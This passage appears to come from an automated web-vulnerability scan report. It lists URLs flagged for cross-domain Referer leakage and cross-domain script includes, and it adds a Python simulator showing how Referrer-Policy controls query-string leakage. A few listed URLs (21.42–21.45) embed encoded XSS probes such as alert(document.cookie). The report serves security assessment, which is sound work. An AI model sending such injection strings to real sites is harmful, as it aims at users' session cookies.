20.218. http://www201.americanexpress.com/business-credit-cards/business-solutions/overview

20.219. http://www201.americanexpress.com/business-credit-cards/find-business-credit-cards

20.220. http://www201.americanexpress.com/business-credit-cards/see-all-business-credit-cards

20.221. http://www201.americanexpress.com/getthecard/

20.222. http://www201.americanexpress.com/getthecard/home

20.223. https://www201.americanexpress.com/MobileWeb/index.jsp

20.224. https://www209.americanexpress.com/merchant/marketing-data/pages/home

20.225. https://www209.americanexpress.com/merchant/marketing-data/pages/marketingprograms

20.226. https://www209.americanexpress.com/merchant/marketing-data/pages/reportsandtrends

20.227. http://www212.americanexpress.com/dsmlive/dsm/dom/us/en/legaldisclosures/websiterulesandregulations.do

20.228. https://www212.americanexpress.com/dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do

20.229. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/feefreeservices/pages/globalassist_allccsg_shareddetails.do

20.230. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do

20.231. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/pass_markup_homepage.do

20.232. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/travelerschequesandforeigncurrency.do

20.233. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

20.234. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/smallbusiness/businesstravel/businesstravel.do

20.235. https://www212.americanexpress.com/dsmlive/dsm/dom/us/merchants/nonsecure/acceptthecard.do

20.236. https://www212.americanexpress.com/dsmlive/dsm/dom/us/merchants/nonsecure/manageyouraccount.do

20.237. https://www212.americanexpress.com/dsmlive/dsm/int/contactus/personalsavings.do

20.238. https://www212.americanexpress.com/dsmlive/dsm/int/fxip/fxinternationalpayments.do

20.239. https://www212.americanexpress.com/dsmlive/dsm/int/us/en/cmaproductspage.do

20.240. https://www295.americanexpress.com/entertainmentaccess/home.do

20.241. https://www295.americanexpress.com/premium/credit-card-travel-insurance/home.do

20.242. http://www7.aaos.org/education/courses/course_detail.aspx
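
Headings 19 and 20 list the same underlying condition seen from two sides: a page whose URL carries a query string causes the browser to contact another domain (a script, image, iframe or a form action), and the Referer header sent with that request carries the page URL, query string included. What actually reaches the third party depends on the page's Referrer-Policy. The simulator below is an added example written for this page, not the crawler's code; the page URL and target URLs are constructed, and it compares origins (scheme, host, port), which is a stricter notion of "same domain" than the crawler's.

```python
"""Referer leakage simulator for cross-origin requests.

Added example, not the CloudScan/Burp scanner's code.  Given a page URL and the
URLs it makes the browser fetch, classify each target as same-origin or
cross-origin and compute the Referer value a browser sends under a given
Referrer-Policy, following the policy names in the W3C Referrer Policy spec.
"""
from urllib.parse import urlsplit, urlunsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """(scheme, host, port) with the default port filled in and host lower-cased."""
    u = urlsplit(url)
    return (u.scheme.lower(), (u.hostname or "").lower(), u.port or DEFAULT_PORTS.get(u.scheme.lower()))


def same_origin(a, b):
    return origin(a) == origin(b)


def strip_for_referer(url):
    """A Referer never carries userinfo or the fragment (RFC 7231 section 5.5.2)."""
    u = urlsplit(url)
    host = f"{u.hostname}:{u.port}" if u.port else (u.hostname or "")
    return urlunsplit((u.scheme, host, u.path, u.query, ""))


def origin_string(url):
    scheme, host, port = origin(url)
    return f"{scheme}://{host}:{port}/" if port != DEFAULT_PORTS.get(scheme) else f"{scheme}://{host}/"


def referer_for(page_url, target_url, policy="strict-origin-when-cross-origin"):
    """Referer sent when page_url fetches target_url, or None for no header at all.
    A "downgrade" is an https page fetching an http target."""
    downgrade = urlsplit(page_url).scheme == "https" and urlsplit(target_url).scheme == "http"
    same = same_origin(page_url, target_url)
    full, org = strip_for_referer(page_url), origin_string(page_url)
    if policy == "no-referrer":
        return None
    if policy == "unsafe-url":
        return full
    if policy == "no-referrer-when-downgrade":   # browser behaviour before Referrer-Policy existed
        return None if downgrade else full
    if policy == "origin":
        return org
    if policy == "strict-origin":
        return None if downgrade else org
    if policy == "same-origin":
        return full if same else None
    if policy == "origin-when-cross-origin":
        return full if same else org
    if policy == "strict-origin-when-cross-origin":  # current browser default
        return full if same else (None if downgrade else org)
    raise ValueError(f"unknown Referrer-Policy {policy!r}")


def audit(page_url, targets, policy):
    """targets: [(kind, url)] with kind in script/img/iframe/form-post.
    Returns one finding per cross-origin target, noting whether the query string leaks."""
    findings = []
    for kind, url in targets:
        if same_origin(page_url, url):
            continue
        ref = referer_for(page_url, url, policy)
        findings.append({
            "kind": kind,
            "target": url,
            "referer": ref,
            "leaks_query": ref is not None and urlsplit(ref).query != "",
            "cross_domain_post": kind == "form-post",   # heading 19's condition
        })
    return findings


# Constructed sample: hypothetical hosts, a session token in the page's query string.
PAGE_URL = "https://shop.example/checkout?session=abc123&promo=SPRING"
TARGETS = [
    ("script", "https://shop.example/static/app.js"),        # same-origin, never reported
    ("script", "http://cdn.example-ads.net/tag.js"),          # cross-origin and a downgrade
    ("img", "https://stats.example-ads.net/pixel.gif"),       # cross-origin tracking pixel
    ("form-post", "https://payments.example-bank.com/pay"),   # cross-domain POST
]

if __name__ == "__main__":
    for policy in ("no-referrer-when-downgrade", "strict-origin-when-cross-origin"):
        print(policy)
        for f in audit(PAGE_URL, TARGETS, policy):
            print(f"  {f['kind']:9} -> {f['target']}: Referer={f['referer']!r} leaks_query={f['leaks_query']}")
```

Running it under no-referrer-when-downgrade, the behaviour every browser had when this report was generated, shows the session token reaching both the tracking pixel and the payment host; under strict-origin-when-cross-origin only the origin is sent. The fix for a finding under heading 20 is therefore a Referrer-Policy header (or meta tag) rather than removing the third-party resource, while a heading 19 finding also needs a review of what the form actually posts to the other domain.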

21. Cross-domain script include

21.1. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.11

21.2. http://answers.splunk.com/

21.3. http://answers.splunk.com/questions/ask

21.4. http://bankskripsi.com/article/casas

21.5. http://bassistance.de/jquery-plugins/jquery-plugin-validation/

21.6. http://blog.freedownloadscenter.com/

21.7. http://blog.owneriq.com/

21.8. http://blog.tipd.com/

21.9. http://blog.vibrantmedia.com/

21.10. http://brandonaaron.net/

21.11. http://buzz.yahoo.com/

21.12. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html

21.13. http://channelmarketing.owneriq.com/rmb-account/login-page

21.14. http://chattino.com/

21.15. http://creativecommons.org/licenses/by-nc-nd/2.5/

21.16. http://current.com/

21.17. http://dailyme.com/

21.18. http://dean.edwards.name/weblog/2006/03/base/

21.19. http://developer.yahoo.com/yui/

21.20. http://developer.yahoo.com/yui/license.html

21.21. http://digg.com/submit

21.22. http://docs.jquery.com/Plugins/Validation

21.23. http://docs.jquery.com/UI

21.24. http://docs.jquery.com/UI/Datepicker

21.25. http://docs.jquery.com/UI/Tabs

21.26. http://driverbyte.com/a

21.27. http://driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload

21.28. https://ebus.ota.org/default.aspx

21.29. http://en.wikipedia.org/wiki/MIT_License

21.30. http://etfdb.com/

21.31. http://fls.doubleclick.net/activityi

21.32. http://funp.com/

21.33. http://fussballmania.com/

21.34. http://getclicky.com/106253

21.35. http://googleads.g.doubleclick.net/pagead/ads

21.36. http://googleads.g.doubleclick.net/pagead/ads

21.37. http://groups.google.com/group/jquery-dev/browse_thread/thread/36395b7ab510dd5d

21.38. http://gsgd.co.uk/sandbox/jquery/easing/

21.39. http://hellotxt.com/

21.40. http://hhonors1.hilton.com/en_US/hh/home_index.do

21.41. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type/product_problem

21.42. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/

21.43. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%27%3balert%281%29%2f%2f35f276845e/product_problem/

21.44. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/

21.45. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%27%3balert%28document.cookie%29%2f%2f8fcf167d281/d/type/product_problem/

21.46. http://homeappliance.manualsonline.com/managemystuff.html

21.47. http://identi.ca/

21.48. http://imera.com.br/

21.49. http://info.riministreet.com/50percentsavings.html

21.50. http://itunes.apple.com/us/app/orthosupersite/id401876377

21.51. http://jquery.com/

21.52. http://jquery.org/license

21.53. http://jqueryui.com/about

21.54. http://jqueryui.com/themeroller/

21.55. http://kambimagazine.blogspot.com/2007/08/malayalam-kambikathakal-kambi-kathakal.html

21.56. http://labs.eweek.com/

21.57. http://labs.eweek.com/

21.58. http://latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

21.59. http://mad4milk.net/

21.60. http://malayalamkambikathakaldownload.blogspot.com/2010/05/kochupusthakam-kambikathakal-download.html

21.61. http://malayalamkambikathakaldownload.blogspot.com/2010/05/malayalam-kochupusthakam-kambikathakal.html

21.62. http://mallustories1.blogspot.com/

21.63. http://mallustories1.blogspot.com/2008/11/malayalam-hot-stories.html

21.64. http://mallustories1.blogspot.com/2009/02/adhyanubavam.html

21.65. http://malsup.com/jquery/form/

21.66. http://messenger.yahoo.com/

21.67. http://mir.aculo.us/

21.68. http://mlayalamhotstories.blogspot.com/2010_10_01_archive.html

21.69. http://mootools.net/developers/

21.70. http://music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

21.71. http://netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

21.72. http://newstrust.net/

21.73. http://nyromodal.nyrodev.com/

21.74. http://opensource.org/licenses/lgpl-license.php

21.75. http://opensource.org/licenses/mit-license.php

21.76. http://pagead2.googlesyndication.com/pagead/s/iframes_api_loader.html

21.77. http://pdfdatabase.com/search/malayalam-kochupusthakam-free-download.html

21.78. http://pdfebooksfreedownload.com/

21.79. http://personalsavings.americanexpress.com/

21.80. http://prototypejs.org/

21.81. http://qooxdoo.org/

21.82. http://rapidog.com/game-thoi-trang-bup-be-ba-by-rapidshare.html

21.83. http://rmncdn.com/widget/out/

21.84. http://rmncdn.com/widget_cdn.html

21.85. http://script.aculo.us/

21.86. http://shop.kledy.de/

21.87. http://slashdot.org/

21.88. http://slashdot.org/submit.pl

21.89. http://sourceforge.net/projects/winscp/

21.90. http://sphinn.com/

21.91. http://statistics.wibiya.com/SetToolbarLoad.php

21.92. http://storyonline1.blogspot.com/

21.93. http://storyonline1.blogspot.com/2010/05/kochupusthakam-malayalam-kambi-kathakal.html

21.94. http://tbe.taleo.net/NA7/ats/careers/jobSearch.jsp

21.95. http://technorati.com/

21.96. http://tipd.com/

21.97. http://tipd.com/register

21.98. http://travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

21.99. http://twitter.com/

21.100. http://twitter.com/ORTHOSuperSite

21.101. http://twitter.com/VibrantMedia

21.102. http://twitter.com/owneriq

21.103. http://twitter.com/tipd

21.104. http://twitter.com/tipd

21.105. http://vegetarian.about.com/od/soupsstewsandchili/r/hotandsour.htm

21.106. http://redacted/MRT/iview/264255445/direct

21.107. http://redacted/MRT/iview/264255445/direct

21.108. http://redacted/MRT/iview/264255445/direct

21.109. http://redacted/MRT/jview/267859374/direct

21.110. http://redacted/MRT/jview/267859374/direct

21.111. http://redacted/MRT/jview/267859374/direct

21.112. http://vodpod.com/

21.113. http://wirtschaftsthemen.net/politik/ausland/der-westen-opfert-aegyptens-demokratie-seiner-paranoia/006911.html

21.114. http://wirtschaftsthemen.net/unternehmen/karriere/eine-frauenquote-koennte-tausende-arbeitsplaetze-vernichten/006920.html

21.115. http://wordpress.com/

21.116. http://www.addthis.com/bookmark.php

21.117. http://www.addtoany.com/email

21.118. https://www.aeprepaid.com/index.cfm

21.119. http://www.aim.com/

21.120. http://www.alistapart.com/articles/taminglists/

21.121. http://www.allvoices.com/

21.122. http://www.alvit.de/css-showcase/

21.123. http://www.amazon.com/

21.124. https://www.americanexpress.com/gift/giftcardslanding.shtml

21.125. http://www.amextravelresources.com/

21.126. http://www.arto.com/

21.127. http://www.bargainforce.com/

21.128. http://www.baselinemag.com/

21.129. http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/

21.130. http://www.baselinemag.com/googlecse.html

21.131. http://www.bebo.com/

21.132. http://www.beckerortho.com/

21.133. http://www.beckerortho.com/catalog.htm

21.134. http://www.beckerortho.com/continuing/

21.135. http://www.beckerortho.com/etiology/

21.136. http://www.beckerortho.com/friction_management/

21.137. http://www.beckerortho.com/history.htm

21.138. http://www.beckerortho.com/history/becker_history.htm

21.139. http://www.beckerortho.com/knee/training.htm

21.140. http://www.beckerortho.com/new/

21.141. http://www.beckerortho.com/pastfp.htm

21.142. http://www.beckerortho.com/pdac.asp

21.143. http://www.beckerortho.com/services.htm

21.144. http://www.beckerortho.com/tech.htm

21.145. http://www.beckerortho.com/thanks.htm

21.146. http://www.bitty.com/

21.147. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

21.148. http://www.bookmarks.fr/

21.149. https://www.box.net/

21.150. http://www.breitband-anbieter.com/news/iphone-5-ipad-2-und-die-lte-tarife-der-deutschen-telekom-659000/

21.151. http://www.buddymarks.com/

21.152. http://www.buscaglia.com/resources.htm

21.153. http://www.care2.com/news/

21.154. http://www.chattino.com/

21.155. http://www.codero.com/dedicated-server-hosting/

21.156. http://www.codylindley.com/

21.157. http://www.connotea.org/

21.158. http://www.cssplay.co.uk/menus/final_drop.html

21.159. http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

21.160. http://www.digitalia.be/

21.161. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

21.162. http://www.download32.com/

21.163. http://www.download32.com/acceleration-tools-33178-category.html

21.164. http://www.download32.com/atelier-web-security-port-scanner-d22620.html

21.165. http://www.download32.com/atelier-web-security-port-scanner-i22620.html

21.166. http://www.download32.com/category.html

21.167. http://www.download32.com/command-reference-to-tcp-ip-tools-for-handbase-d72982.html

21.168. http://www.download32.com/command-reference-to-tcp-ip-tools-for-handbase-i72982.html

21.169. http://www.download32.com/contactus.html

21.170. http://www.download32.com/dns-thing-d23380.html

21.171. http://www.download32.com/dns-thing-i23380.html

21.172. http://www.download32.com/dns-watcher-d23381.html

21.173. http://www.download32.com/dns-watcher-i23381.html

21.174. http://www.download32.com/interactive-dns-query-d24595.html

21.175. http://www.download32.com/interactive-dns-query-i24595.html

21.176. http://www.download32.com/ipjudo-1-1a-d54908.html

21.177. http://www.download32.com/ipjudo-1-1a-i54908.html

21.178. http://www.download32.com/ipjudo-d24736.html

21.179. http://www.download32.com/ipjudo-i24736.html

21.180. http://www.download32.com/iseu---eu-domain-availability-checker-d24769.html

21.181. http://www.download32.com/iseu---eu-domain-availability-checker-i24769.html

21.182. http://www.download32.com/linktous.html

21.183. http://www.download32.com/linux-19-platform.html

21.184. http://www.download32.com/macintosh-2-platform.html

21.185. http://www.download32.com/netstat-agent-portable-d60918.html

21.186. http://www.download32.com/netstat-agent-portable-i60918.html

21.187. http://www.download32.com/network-utilities-module-for-webmin-d78618.html

21.188. http://www.download32.com/network-utilities-module-for-webmin-i78618.html

21.189. http://www.download32.com/new.html

21.190. http://www.download32.com/nslookup-software.html

21.191. http://www.download32.com/ntoolc-network-tools-i68640.html

21.192. http://www.download32.com/palm-os-3-platform.html

21.193. http://www.download32.com/resolve-d55498.html

21.194. http://www.download32.com/resolve-i55498.html

21.195. http://www.download32.com/resources/all.js

21.196. http://www.download32.com/resources/img.js

21.197. http://www.download32.com/rss

21.198. http://www.download32.com/search/Array

21.199. http://www.download32.com/skdns-activex-control-d10700.html

21.200. http://www.download32.com/skdns-activex-control-i10700.html

21.201. http://www.download32.com/submit.html

21.202. http://www.download32.com/top.html

21.203. http://www.download32.com/windows-1-platform.html

21.204. http://www.dustindiaz.com/min-height-fast-hack/*/

21.205. http://www.dynamicdrive.com/dynamicindex5/balloontooltip.htm

21.206. http://www.ebooklibs.com/

21.207. http://www.evernote.com/

21.208. http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-Jan-20-2010/

21.209. http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-July-24-2009/

21.210. http://www.eweek.com/c/a/Windows/5-Reasons-Companies-Arent-Skipping-Vista/

21.211. http://www.eweek.com/c/a/Windows/Ensuring-Smooth-Upgrade-Path-with-Windows-Vista/

21.212. http://www.eweek.com/c/a/Windows/How-to-Accurately-Plan-for-Windows-Server-2008-Hardware/

21.213. http://www.eweek.com/c/s/Videos/

21.214. http://www.facebook.com/

21.215. http://www.facebook.com/BlackBerry

21.216. http://www.facebook.com/BlackBerryES

21.217. http://www.facebook.com/BlackBerryFR

21.218. http://www.facebook.com/BlackBerryNL

21.219. http://www.facebook.com/BlackBerryUK

21.220. http://www.facebook.com/BlackBerryZA

21.221. http://www.facebook.com/Craig.Marshall.Deutschland

21.222. http://www.facebook.com/ajouli1

21.223. http://www.facebook.com/americanexpress

21.224. http://www.facebook.com/americanexpress

21.225. http://www.facebook.com/dcmoncayo

21.226. http://www.facebook.com/fabianomorige

21.227. http://www.facebook.com/laprincesita.inigulable

21.228. http://www.facebook.com/marytere.medina

21.229. http://www.facebook.com/pages/Kledyde/344540630304

21.230. http://www.facebook.com/pages/OrthoSuperSitecom/296664256434

21.231. http://www.facebook.com/pages/Orthopaedic-Trauma-Association/212018968439

21.232. http://www.facebook.com/plugins/like.php

21.233. http://www.facebook.com/plugins/like.php

21.234. http://www.facebook.com/plugins/likebox.php

21.235. http://www.facebook.com/plugins/likebox.php

21.236. http://www.facebook.com/pointeresortsaz

21.237. http://www.facebook.com/uschi.eller

21.238. http://www.facebook.com/vibrantmedia

21.239. http://www.fark.com/

21.240. http://www.fbi.gov/about-us/investigate/cyber/cyber

21.241. http://www.fbi.gov/nipc/welcome.htm

21.242. http://www.filetransit.com/

21.243. http://www.filetransit.com/alphaindex.php

21.244. http://www.filetransit.com/demo.php

21.245. http://www.filetransit.com/download.php

21.246. http://www.filetransit.com/files.php

21.247. http://www.filetransit.com/freeware.php

21.248. http://www.filetransit.com/index.php

21.249. http://www.filetransit.com/screenshot.php

21.250. http://www.filetransit.com/view.php

21.251. http://www.fitness-gesundheit.biz/

21.252. http://www.fitness-gesundheit.biz/die-gelenkbelastung-der-unteren-extremitaten-beim-nordic-walking/

21.253. http://www.folkd.com/

21.254. http://www.forex-direkt.de/

21.255. http://www.forex-direkt.de/wp-content/pagepeel/pageear_b.jpg

21.256. http://www.forex-direkt.de/wp-content/pagepeel/pageear_s.jpg

21.257. http://www.forexyard.com/css/quotes-chart.cssbdb85

21.258. http://www.freedownloadscenter.com/

21.259. http://www.freedownloadscenter.com/terms/html-tracert-nslookup/nslookup.html

21.260. http://www.freedownloadscenter.com/terms/team-calendar/calendar.html

21.261. http://www.freewebs.com/ftasatworld/upgradefortecultra.htm

21.262. http://www.gabbr.com/

21.263. http://www.geektools.com/

21.264. http://www.giveawayoftheday.com/

21.265. http://www.godaddy.com/default.aspx

21.266. https://www.google.com/adsense/support/bin/request.py

21.267. http://www.hyves.nl/

21.268. https://www.infosecisland.com/blogview/5213-Splunk-4-Users-Review.html

21.269. http://www.jamespot.com/

21.270. http://www.jazdtech.com/techdirect/

21.271. http://www.jumptags.com/

21.272. http://www.kledy.co.uk/

21.273. http://www.kledy.de/

21.274. http://www.kledy.de/bookmarks.php

21.275. http://www.kledy.de/bookmarks.php/

21.276. http://www.kledy.de/buttons.php

21.277. http://www.kledy.de/groups.php

21.278. http://www.kledy.de/impressum.php

21.279. http://www.kledy.de/login.php

21.280. http://www.kledy.de/topusers.php

21.281. http://www.kledy.es/

21.282. http://www.kledy.eu/

21.283. http://www.kledy.it/

21.284. http://www.kledy.us/

21.285. http://www.klivio.com/

21.286. http://www.klivio.de/

21.287. http://www.linkagogo.com/

21.288. http://www.linkfixerplus.com/

21.289. http://www.linuxsecurity.com/

21.290. http://www.livejournal.com/

21.291. http://www.manualsonline.com/privacy.html

21.292. http://www.manualsonline.com/tc.html

21.293. http://www.merapakistan.com/directory/draw_list_prize_bond_draw_result_7500.html

21.294. http://www.migrationexpertzone.com/

21.295. http://www.mindbodygreen.com/

21.296. http://www.mister-wong.com/

21.297. http://www.mittelstandsblog.de/

21.298. http://www.mittelstandsblog.de/2011/02/gfk-prognose-deutsche-2011-noch-konsumfreudiger/

21.299. http://www.mittelstandsblog.de/wp-content/themes/j4b20/dfp-leaderboard.js

21.300. http://www.mittelstandsblog.de/wp-content/themes/j4b20/dfp-rectangle.js

21.301. http://www.mittelstandsblog.de/wp-content/themes/j4b20/dfp-skyscraper.js

21.302. http://www.mylinkvault.com/

21.303. http://www.myspace.com/

21.304. http://www.networksimplicity.com/openssh/

21.305. http://www.newsvine.com/

21.306. http://www.nowpublic.com/

21.307. http://www.oandp.com/

21.308. http://www.officedepot.com/

21.309. http://www.officedepot.com/promo/list5.do

21.310. http://www.oneview.de/

21.311. http://www.openforum.com/

21.312. https://www.openforum.com/

21.313. https://www.openforum.com/

21.314. http://www.opensource.org/licenses

21.315. http://www.opensource.org/licenses/gpl-license.php

21.316. http://www.opensource.org/licenses/mit-license.php

21.317. http://www.ortho.hyperguides.com/

21.318. http://www.orthosupersite.com/

21.319. http://www.orthosupersite.com/cmecenter/

21.320. http://www.orthougm.com/

21.321. http://www.orthougm.com/1993_hip_hop_songs.html

21.322. http://www.orthougm.com/about_big_surf.html

21.323. http://www.orthougm.com/adult_add_symptoms_answerbag.html

21.324. http://www.orthougm.com/angelica_lee_profession.html

21.325. http://www.orthougm.com/angelica_lee_sin_je_chinese.html

21.326. http://www.orthougm.com/angelina_jolean.html

21.327. http://www.orthougm.com/banco_scotia.html

21.328. http://www.orthougm.com/how_to_use_nslookup.html

21.329. http://www.orthougm.com/kabul.html

21.330. http://www.orthougm.com/nextbio_is_op.html

21.331. http://www.orthougm.com/nslookup.html

21.332. http://www.orthougm.com/super_cheap_air_ticket.html

21.333. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

21.334. http://www.owneriq.com/

21.335. http://www.owneriq.com/about-us

21.336. http://www.owneriq.com/careers

21.337. http://www.owneriq.com/contact-us

21.338. http://www.owneriq.com/events

21.339. http://www.owneriq.com/investors

21.340. http://www.owneriq.com/management

21.341. http://www.owneriq.com/manuals-online

21.342. http://www.owneriq.com/mostiq

21.343. http://www.owneriq.com/opt-out

21.344. http://www.owneriq.com/ownership-targeting

21.345. http://www.owneriq.com/partners

21.346. http://www.owneriq.com/press

21.347. http://www.owneriq.com/press-coverage

21.348. http://www.owneriq.com/product-ownership-party

21.349. http://www.owneriq.com/retailers-and-manufacturers

21.350. http://www.owneriq.com/retargeting

21.351. http://www.owneriq.com/reversing-market-research

21.352. http://www.owneriq.com/sitemap

21.353. http://www.pchell.com/support/toptext.shtml

21.354. http://www.pcmag.com/&|http:/www.pcmag.com/reviews|http:/www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

21.355. http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

21.356. http://www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

21.357. http://www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

21.358. http://www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

21.359. http://www.pcmag.com/reviews|http:/www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

21.360. http://www.pdf-freedownload.net/

21.361. http://www.pdf-search-engine.net/malayalam-kochupusthakam-pdf.html

21.362. http://www.pdfforge.org/

21.363. http://www.peppernews.eu/

21.364. http://www.pgpi.org/

21.365. http://www.pointehilton.com/

21.366. http://www.pointehilton.com/404.cfm

21.367. http://www.pointehilton.com/awards/index.cfm

21.368. http://www.pointehilton.com/contact/index.cfm

21.369. http://www.pointehilton.com/employment/index.cfm

21.370. http://www.pointehilton.com/favicon.ico

21.371. http://www.pointehilton.com/sitemap/index.cfm

21.372. http://www.pointehilton.com/special-offers/index.cfm

21.373. http://www.printfriendly.com/

21.374. http://www.protopage.com/

21.375. http://www.pusha.se/

21.376. http://www.quantcast.com/p-bdv9UMaVrliL2

21.377. http://www.rackspace.com/apps/email_hosting/exchange_hosting/

21.378. http://www.retailmenot.com/

21.379. http://www.retailmenot.com/out/

21.380. http://www.scare666.com/news/gambar

21.381. http://www.shoppinga.de/

21.382. http://www.simpy.com/

21.383. http://www.slackbooks.com/404.aspx

21.384. http://www.slackbooks.com/Athletic+Training

21.385. http://www.slackbooks.com/BestSellers.aspx

21.386. http://www.slackbooks.com/ContactUs.aspx

21.387. http://www.slackbooks.com/Manual+Therapy

21.388. http://www.slackbooks.com/NewTitleNotification.aspx

21.389. http://www.slackbooks.com/Orthotics+and+Prosthetics

21.390. http://www.slackbooks.com/Physical+Therapy

21.391. http://www.slackbooks.com/ShoppingCart.aspx

21.392. http://www.slackbooks.com/aclreconstuct

21.393. http://www.slackbooks.com/ccacl

21.394. http://www.slackbooks.com/ccknee

